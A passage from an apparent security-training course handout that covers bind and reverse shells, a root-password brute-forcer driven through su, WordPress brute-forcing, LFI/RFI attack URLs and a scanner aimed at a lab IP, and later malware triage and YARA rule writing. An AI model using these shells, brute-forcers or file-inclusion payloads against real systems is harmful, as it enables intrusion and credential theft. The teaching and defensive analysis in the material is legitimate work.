1649 | http://hexale.blogspot.com/2008/10/wifizoo-and-new-version-of-scapy.html | |
1650 | ||
1651 | ||
conf.verb=0 is a verbosity setting (conf = configuration, verb = verbosity).
1653 | ||
1654 | ||
1655 | ||
1656 | Here are some good Scapy references: | |
1657 | http://www.secdev.org/projects/scapy/doc/index.html | |
1658 | http://resources.infosecinstitute.com/port-scanning-using-scapy/ | |
1659 | http://www.hackerzvoice.net/ouah/blackmagic.txt | |
1660 | http://www.workrobot.com/sansfire2009/SCAPY-packet-crafting-reference.html | |
1661 | ||
1662 | ||
1663 | ###################################### | |
1664 | # Lesson 26: Bind and Reverse Shells # | |
1665 | ###################################### | |
1666 | vi simplebindshell.py | |
1667 | ||
1668 | ||
1669 | #!/bin/python | |
1670 | import os,sys,socket | |
1671 | ||
# Course demo bind shell: listens on `port` and hands the accepted connection
# to /bin/sh.  Defender notes: a process that binds a port, accepts, dup2()s
# the socket onto fd 0/1/2 and then execs a shell is a textbook host-detection
# pattern (auditd/EDR socket-plus-execve lineage, or a new listener on an
# unexpected port in `ss -ltnp`), and an inbound default-deny firewall stops
# the client from ever connecting.
ls = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
print '-Creating socket..'
port = 31337
try:
    ls.bind(('', port))          # '' = every interface
    print '-Binding the port on '
    ls.listen(1)
    print '-Listening, '
    (conn, addr) = ls.accept()   # blocks until a client connects
    print '-Waiting for connection...'
    cli= conn.fileno()
    print '-Redirecting shell...'
    os.dup2(cli, 0)
    print 'In, '
    os.dup2(cli, 1)
    print 'Out, '
    os.dup2(cli, 2)
    print 'Err'
    print 'Done!'
    arg0='/bin/sh'
    arg1='-a'
    args=[arg0]+[arg1]
    os.execv(arg0, args)         # replaces this process; nothing below runs on success
except(socket.error):
    print 'fail\n'
    conn.close()
    sys.exit(1)
1699 | ||
1700 | ||
1701 | ||
1702 | ||
1703 | ||
1704 | ||
1705 | ||
1706 | nc TARGETIP 31337 | |
1707 | ||
1708 | ||
1709 | ||
1710 | --------------------- | |
1711 | Preparing the target for a reverse shell | |
1712 | $ ncat -lvp 4444 | |
1713 | ||
1714 | ||
1715 | ||
1716 | --open another terminal-- | |
1717 | wget https://www.trustedsec.com/files/simple_py_shell.py | |
1718 | ||
1719 | vi simple_py_shell.py | |
1720 | ||
1721 | ||
1722 | ||
1723 | ||
1724 | ||
1725 | ||
1726 | ------------------------------- | |
1727 | Tricky shells | |
1728 | ||
1729 | Reference: | |
1730 | http://securityweekly.com/2011/10/python-one-line-shell-code.html | |
1731 | http://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/ | |
1732 | ||
1733 | ||
1734 | ||
1735 | ||
1736 | ||
1737 | ||
1738 | ############################# | |
1739 | # Reference Videos To Watch # | |
1740 | ############################# | |
1741 | Here is your third set of youtube videos that I'd like for you to watch: | |
1742 | https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 21-30) | |
1743 | ||
1744 | ||
1745 | ||
1746 | ||
1747 | ################################################# | |
1748 | # Lesson 27: Python Functions & String Handling # | |
1749 | ################################################# | |
1750 | ||
1751 | Python can make use of functions: | |
1752 | http://www.tutorialspoint.com/python/python_functions.htm | |
1753 | ||
1754 | ||
1755 | ||
1756 | Python can interact with the 'crypt' function used to create Unix passwords: | |
1757 | http://docs.python.org/2/library/crypt.html | |
1758 | ||
1759 | ||
1760 | ||
1761 | Tonight we will see a lot of the split() method so be sure to keep the following references close by: | |
1762 | http://www.tutorialspoint.com/python/string_split.htm | |
1763 | ||
1764 | ||
1765 | Tonight we will see a lot of slicing so be sure to keep the following references close by: | |
1766 | http://techearth.net/python/index.php5?title=Python:Basics:Slices | |
1767 | ||
1768 | ||
1769 | ||
1770 | ||
1771 | ||
1772 | ################################ | |
1773 | # Lesson 28: Password Cracking # | |
1774 | ################################ | |
1775 | ||
1776 | wget https://s3.amazonaws.com/SecureNinja/Python/htcrack.py | |
1777 | ||
1778 | vi htcrack.py | |
1779 | ||
1780 | vi list.txt | |
1781 | ||
1782 | hello | |
1783 | goodbye | |
1784 | red | |
1785 | blue | |
1786 | yourname | |
1787 | tim | |
1788 | bob | |
1789 | ||
1790 | ||
1791 | htpasswd -nd yourname | |
1792 | - enter yourname as the password | |
1793 | ||
1794 | ||
1795 | ||
1796 | python htcrack.py joe:7XsJIbCFzqg/o list.txt | |
1797 | ||
1798 | ||
1799 | ||
1800 | ||
1801 | sudo apt-get install -y python-mechanize python-pexpect python-pexpect-doc | |
1802 | ||
1803 | rm -rf mechanize-0.2.5.tar.gz | |
1804 | ||
1805 | sudo /bin/bash | |
1806 | ||
1807 | passwd | |
1808 | ***set root password*** | |
1809 | ||
1810 | ||
1811 | ||
1812 | ||
1813 | vi rootbrute.py | |
1814 | ||
1815 | ||
1816 | #!/usr/bin/env python | |
1817 | ||
1818 | import sys | |
# pexpect is a third-party module (python-pexpect); bail out with a pointer if missing.
try:
    import pexpect
except(ImportError):
    print "\nYou need the pexpect module."
    print "http://www.noah.org/wiki/Pexpect\n"
    sys.exit(1)

#Change this if needed.
# The exact failure text depends on the distribution's su/PAM messages;
# pexpect matches it literally.
# LOGIN_ERROR = 'su: incorrect password'
LOGIN_ERROR = "su: Authentication failure"
1829 | ||
def brute(word):
    """Try one candidate password against the local root account via `su`.

    Defender notes: each call is a full `su` attempt, so every failure is
    logged by PAM (auth.log / journal) and by auditd if enabled - a burst of
    "su: Authentication failure" lines from one user is the signal to alert
    on, and pam_faillock/pam_tally lockouts or restricting `su` to the wheel
    group (pam_wheel) cap what such a loop can achieve.
    """
    print "Trying:",word
    child = pexpect.spawn('/bin/su')
    child.expect('Password: ')
    child.sendline(word)
    i = child.expect (['.+\s#\s',LOGIN_ERROR, pexpect.TIMEOUT],timeout=3)
    if i == 1:
        print "Incorrect Password"

    if i == 2:
        print "\n\t[!] Root Password:" ,word
        child.sendline ('id')
        print child.before
        child.interact()   # hands the terminal over to the spawned session
1844 | ||
# Usage: exactly one argument, the wordlist path.
if len(sys.argv) != 2:
    print "\nUsage : ./rootbrute.py <wordlist>"
    print "Eg: ./rootbrute.py words.txt\n"
    sys.exit(1)

# The whole wordlist is read into memory; the file handle is never closed explicitly.
try:
    words = open(sys.argv[1], "r").readlines()
except(IOError):
    print "\nError: Check your wordlist path\n"
    sys.exit(1)

print "\n[+] Loaded:",len(words),"words"
print "[+] BruteForcing...\n"
for word in words:
    brute(word.replace("\n",""))   # strip the trailing newline from each line
1860 | ||
1861 | ||
1862 | ||
1863 | ||
1864 | References you might find helpful: | |
1865 | http://stackoverflow.com/questions/15026536/looping-over-a-some-ips-from-a-file-in-python | |
1866 | ||
1867 | ||
1868 | ||
1869 | ||
1870 | ||
1871 | ||
1872 | ||
1873 | ||
1874 | ||
1875 | wget https://s3.amazonaws.com/SecureNinja/Python/md5crack.py | |
1876 | ||
1877 | vi md5crack.py | |
1878 | ||
1879 | ||
1880 | ||
1881 | ||
1882 | ||
1883 | ||
1884 | Why use hexdigest | |
1885 | http://stackoverflow.com/questions/3583265/compare-result-from-hexdigest-to-a-string | |
1886 | ||
1887 | ||
1888 | ||
1889 | ||
1890 | http://md5online.net/ | |
1891 | ||
1892 | ||
1893 | ||
1894 | ||
1895 | ||
1896 | ||
1897 | ||
1898 | wget https://s3.amazonaws.com/SecureNinja/Python/wpbruteforcer.py | |
1899 | ||
1900 | ||
1901 | ||
1902 | ||
1903 | ############################# | |
1904 | # Reference Videos To Watch # | |
1905 | ############################# | |
Here is your fourth set of youtube videos that I'd like for you to watch:
1907 | https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 31-40) | |
1908 | ||
1909 | ||
1910 | ||
1911 | ||
1912 | ||
1913 | ###################### | |
1914 | # Lesson 29: Web App # | |
1915 | ###################### | |
1916 | vi wpbruteforcer.py | |
1917 | ||
1918 | ||
1919 | python wpbruteforcer.py -t strategicsec.com -u j0e -w list.txt | |
1920 | ||
1921 | ||
1922 | ||
1923 | - Here is an example of an LFI | |
1924 | - Open this page in Firefox: | |
1925 | http://54.186.248.116/showfile.php?filename=contactus.txt | |
1926 | ||
1927 | - Notice the page name (showfile.php) and the parameter name (filename) and the filename (contactus.txt) | |
1928 | - Here you see a direct reference to a file on the local filesystem of the victim machine. | |
1929 | - You can attack this by doing the following: | |
1930 | http://54.186.248.116/showfile.php?filename=/etc/passwd | |
1931 | ||
1932 | - This is an example of a Local File Include (LFI), to change this attack into a Remote File Include (RFI) you need some content from | |
1933 | - somewhere else on the Internet. Here is an example of a text file on the web: | |
1934 | http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt | |
1935 | ||
1936 | - Now we can attack the target via RFI like this: | |
1937 | http://54.186.248.116/showfile.php?filename=http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt | |
1938 | ||
1939 | ||
1940 | - Now let's see if we can write some code to do this for us: | |
1941 | ||
1942 | vi LFI-RFI.py | |
1943 | ||
1944 | ||
1945 | ||
1946 | #!/usr/bin/env python | |
# Course demo: probes the lab host named in TARGET for an LFI (directory
# traversal to /etc/passwd) and an RFI (parameter pointing at an external URL).
# Defender notes: the server-side fix is to map the parameter onto an allow-list
# of file names rather than a path, keep allow_url_include off, and alert on
# "../" runs or URL schemes inside file-name parameters in the access log.
print "\n### PHP LFI/RFI Detector ###"
print "### Sean Arries 09/18/09 ###\n"

import urllib2,re,sys


TARGET = "http://54.186.248.116/showfile.php?filename=contactus.txt"
RFIVULN = "http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt?"
TravLimit = 12   # maximum number of "../" segments to try

print "==> Testing for LFI vulns.."
TARGET = TARGET.split("=")[0]+"=" ## URL MANIPULATION: keep everything up to "filename="
for x in xrange(1,TravLimit): ## ITERATE THROUGH THE LOOP, one more "../" each pass
    TARGET += "../"
    try:
        source = urllib2.urlopen((TARGET+"etc/passwd")).read() ## WEB REQUEST
    except urllib2.URLError, e:
        print "$$$ We had an Error:",e
        sys.exit(0)
    if re.search("root:x:0:0:",source): ## SEARCH FOR TEXT IN SOURCE
        print "!! ==> LFI Found:",TARGET+"etc/passwd"
        break ## BREAK LOOP WHEN VULN FOUND

print "\n==> Testing for RFI vulns.."
TARGET = TARGET.split("=")[0]+"="+RFIVULN ## URL MANIPULATION: replace the value with the remote URL
try:
    source = urllib2.urlopen(TARGET).read() ## WEB REQUEST
except urllib2.URLError, e:
    print "$$$ We had an Error:",e
    sys.exit(0)
if re.search("j0e",source): ## SEARCH FOR TEXT IN SOURCE (marker expected in the remote file)
    print "!! => RFI Found:",TARGET


print "\nScan Complete\n" ## DONE
1982 | ||
1983 | ||
1984 | ||
1985 | ||
1986 | ############################### | |
1987 | # Lesson 30: Malware Analysis # | |
1988 | ############################### | |
This is actual malware (remember to run it in a VM); the password to extract it is 'infected':
1990 | wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip | |
1991 | wget http://www.beenuarora.com/code/analyse_malware.py | |
1992 | ||
1993 | unzip malware-password-is-infected.zip | |
1994 | infected | |
1995 | ||
1996 | file malware.exe | |
1997 | ||
1998 | mv malware.exe malware.pdf | |
1999 | ||
2000 | file malware.pdf | |
2001 | ||
2002 | mv malware.pdf malware.exe | |
2003 | ||
2004 | hexdump -n 2 -C malware.exe | |
2005 | ||
2006 | ***What is '4d 5a' or 'MZ'*** | |
2007 | Reference: http://www.garykessler.net/library/file_sigs.html | |
2008 | ||
2009 | ||
2010 | objdump -x malware.exe | |
2011 | ||
2012 | strings malware.exe | |
2013 | ||
2014 | strings --all malware.exe | head -n 6 | |
2015 | ||
2016 | strings malware.exe | grep -i dll | |
2017 | ||
2018 | strings malware.exe | grep -i library | |
2019 | ||
2020 | strings malware.exe | grep -i reg | |
2021 | ||
2022 | strings malware.exe | grep -i hkey | |
2023 | ||
2024 | strings malware.exe | grep -i hku | |
2025 | ||
2026 | - We didn't see anything like HKLM, HKCU or other registry type stuff | |
2027 | ||
2028 | strings malware.exe | grep -i irc | |
2029 | ||
2030 | strings malware.exe | grep -i join | |
2031 | ||
2032 | strings malware.exe | grep -i admin | |
2033 | ||
2034 | strings malware.exe | grep -i list | |
2035 | ||
2036 | ||
2037 | - List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands | |
2038 | sudo apt-get install -y python-pefile | |
2039 | ||
2040 | vi analyse_malware.py | |
2041 | ||
2042 | python analyse_malware.py malware.exe | |
2043 | ||
2044 | ||
2045 | Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with: | |
2046 | http://derekmorton.name/files/malware_12-14-12.sql.bz2 | |
2047 | ||
2048 | ||
2049 | Malware Repositories: | |
2050 | http://malshare.com/index.php | |
2051 | http://www.malwareblacklist.com/ | |
2052 | http://www.virusign.com/ | |
2053 | http://virusshare.com/ | |
2054 | http://www.tekdefense.com/downloads/malware-samples/ | |
2055 | ||
2056 | ########################################## | |
2057 | # Lesson 31: Creating a Malware Database # | |
2058 | ########################################## | |
2059 | ||
2060 | Creating a malware database (sqlite) | |
2061 | ------------------------------------ | |
2062 | wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py | |
2063 | wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip | |
2064 | unzip malware-password-is-infected.zip | |
2065 | infected | |
2066 | python avsubmit.py --init | |
2067 | python avsubmit.py -f malware.exe -e | |
2068 | ||
2069 | ||
2070 | ||
2071 | ||
2072 | ||
2073 | Creating a malware database (mysql) | |
2074 | ----------------------------------- | |
2075 | Step 1: Installing MySQL database | |
2076 | Run the following command in the terminal: | |
2077 | ||
2078 | sudo apt-get install mysql-server | |
2079 | ||
2080 | Step 2: Installing Python MySQLdb module | |
2081 | Run the following command in the terminal: | |
2082 | ||
2083 | sudo apt-get build-dep python-mysqldb | |
2084 | sudo apt-get install python-mysqldb | |
2085 | ||
2086 | Step 3: Logging in | |
2087 | Run the following command in the terminal: | |
2088 | ||
2089 | mysql -u root -p (set a password of 'malware') | |
2090 | ||
2091 | Then create one database by running following command: | |
2092 | ||
2093 | create database malware; | |
2094 | ||
2095 | ||
2096 | ||
2097 | wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py | |
2098 | ||
2099 | vi mal_to_db.py    (fill in the database connection information; because the DB credentials are stored in the script itself, keep this file on the analysis VM and out of any shared repository) | |
2100 | ||
2101 | python mal_to_db.py -i | |
2102 | ||
2103 | python mal_to_db.py -i -f malware.exe -u | |
2104 | ||
2105 | ||
2106 | mysql -u root -p | |
2107 | malware | |
2108 | ||
2109 | mysql> use malware; | |
2110 | ||
2111 | select id,md5,sha1,sha256,time FROM files; | |
2112 | ||
2113 | mysql> quit; | |
2114 | ||
2115 | ||
2116 | ||
2117 | ||
2118 | ||
2119 | ############################## | |
2120 | # Lesson 32: Setting up Yara # | |
2121 | ############################## | |
2122 | ||
2123 | ||
2124 | sudo apt-get install clamav clamav-freshclam | |
2125 | ||
2126 | sudo freshclam    (if it reports that the log or database is locked by another process, the packaged freshclam service is already running - stop it first or just let it finish updating) | |
2127 | ||
2128 | sudo clamscan    (command names are case-sensitive, so this must be lowercase) | |
2129 | ||
2130 | sudo apt-get install libpcre3 libpcre3-dev | |
2131 | ||
2132 | wget https://github.com/plusvic/yara/archive/v3.1.0.tar.gz | |
2133 | ||
2134 | wget http://yara-project.googlecode.com/files/yara-python-1.4.tar.gz    (not used below: the steps that follow build the yara-python bundled inside the yara-3.1.0 tree, and a yara-python that does not match the installed libyara version is unlikely to work) | |
2135 | ||
2136 | tar -zxvf v3.1.0.tar.gz | |
2137 | ||
2138 | cd yara-3.1.0/ | |
2139 | ||
2140 | ./bootstrap.sh    (needs autoconf, automake and libtool; if this step fails, install them with apt-get and rerun it) | |
2141 | ||
2142 | ./configure | |
2143 | ||
2144 | make | |
2145 | ||
2146 | make check | |
2147 | ||
2148 | sudo make install | |
2149 | ||
2150 | cd yara-python/ | |
2151 | ||
2152 | python setup.py build | |
2153 | ||
2154 | sudo python setup.py install | |
2155 | ||
2156 | cd .. | |
2157 | ||
2158 | yara -v    (if this fails with "libyara.so: cannot open shared object file", run sudo ldconfig so the freshly installed library is found) | |
2159 | ||
2160 | wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/3/clamav_to_yara.py    (Google Code has been shut down; if this URL no longer resolves, fetch the script from an archive or mirror of the Malware Analyst's Cookbook code) | |
2161 | ||
2162 | sigtool -u /var/lib/clamav/main.cvd    (unpacks the signature database into the current directory; main.ndb, used on the next line, is one of the extracted files) | |
2163 | ||
2164 | python clamav_to_yara.py -f main.ndb -o clamav.yara | |
2165 | ||
2166 | wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip | |
2167 | ||
2168 | unzip malware-password-is-infected.zip | |
2169 | infected    (the zip password, typed at the unzip prompt) | |
2170 | ||
2171 | mkdir malcode/ | |
2172 | ||
2173 | mv malware.exe malcode/ | |
2174 | ||
2175 | vi testrule.yara | |
2176 | ---------------- | |
rule IsPE
{
    meta:
        description = "Windows executable file"

    condition:
        // "MZ" DOS header magic at offset 0 ...
        uint16(0) == 0x5A4D and
        // ... and "PE\0\0" at e_lfanew, the 32-bit offset stored at 0x3C.
        // Reading past the end of the file yields undefined in YARA, so a
        // truncated file simply fails to match instead of erroring.
        uint32(uint32(0x3C)) == 0x00004550
}

rule has_no_DEP
{
    meta:
        description = "DEP is not enabled"

    condition:
        // DllCharacteristics sits 0x5E bytes past the PE signature (same offset
        // for PE32 and PE32+); bit 0x0100 is IMAGE_DLLCHARACTERISTICS_NX_COMPAT.
        // Parentheses are for readability only - YARA already binds '&' tighter
        // than '=='. Missing NX is common in older benign binaries too, so this
        // is a weakness indicator, not a malware verdict on its own.
        IsPE and
        (uint16(uint32(0x3C) + 0x5E) & 0x0100) == 0
}

rule has_no_ASLR
{
    meta:
        description = "ASLR is not enabled"

    condition:
        // Same DllCharacteristics word; bit 0x0040 is
        // IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE. As with has_no_DEP, absence of
        // the mitigation alone does not make a file malicious.
        IsPE and
        (uint16(uint32(0x3C) + 0x5E) & 0x0040) == 0
}
2208 | ---------------- | |
2209 | ||
2210 | ||
2211 | yara testrule.yara malcode/malware.exe | |
2212 | ||
2213 | mkdir rules/ | |
2214 | ||
2215 | cd rules/ | |
2216 | ||
2217 | wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/5/capabilities.yara | |
2218 | ||
2219 | wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/6/magic.yara | |
2220 | ||
2221 | wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/4/packer.yara | |
2222 | ||
2223 | cd .. | |
2224 | ||
2225 | yara rules/ malcode/malware.exe    (yara expects a rules file rather than a directory; if this errors, run it once per file, e.g. yara rules/capabilities.yara malcode/malware.exe, or write a small index rule file that "include"s the three downloaded files) | |
2226 | ||
2227 | wget https://github.com/Xen0ph0n/YaraGenerator/archive/master.zip | |
2228 | ||
2229 | unzip master.zip | |
2230 | ||
2231 | cd YaraGenerator-master/ | |
2232 | ||
2233 | python yaraGenerator.py ../malcode/ -r Test-Rule-2 -a "Joe McCray" -d "Test Rule Made With Yara Generator" -t "TEST" -f "exe" | |
2234 | ||
2235 | cat Test-Rule-2.yar | |
2236 | ||
2237 | wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe    (a known-benign control binary used only to check the generated rule for false positives - do not run it; prefer fetching it over https and verifying it against PuTTY's published signatures rather than trusting a plain-HTTP download) | |
2238 | ||
2239 | yara Test-Rule-2.yar putty.exe    (expect no output: an auto-generated rule that also matches an unrelated benign binary is too generic to deploy, so go back and drop the generic strings from it) | |
2240 | ||
2241 | ||
2242 | ||
2243 | ||
2244 | ||
2245 | ||
2246 | ||
2247 | ||
2248 | ||
2249 | ||
2250 | ||
2251 | ||
2252 | ||
2253 | ||
2254 | #################### | |
2255 | # Additional Tasks # | |
2256 | #################### | |
2257 | ||
2258 | - PE Scanner: | |
2259 | https://malwarecookbook.googlecode.com/svn/trunk/3/8/pescanner.py | |
2260 | http://www.beenuarora.com/code/analyse_malware.py | |
2261 | ||
2262 | - AV submission: | |
2263 | http://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py | |
2264 | https://raw.githubusercontent.com/dcmorton/MalwareTools/master/vtsubmit.py | |
2265 | ||
2266 | - Malware Database Creation: | |
2267 | https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py |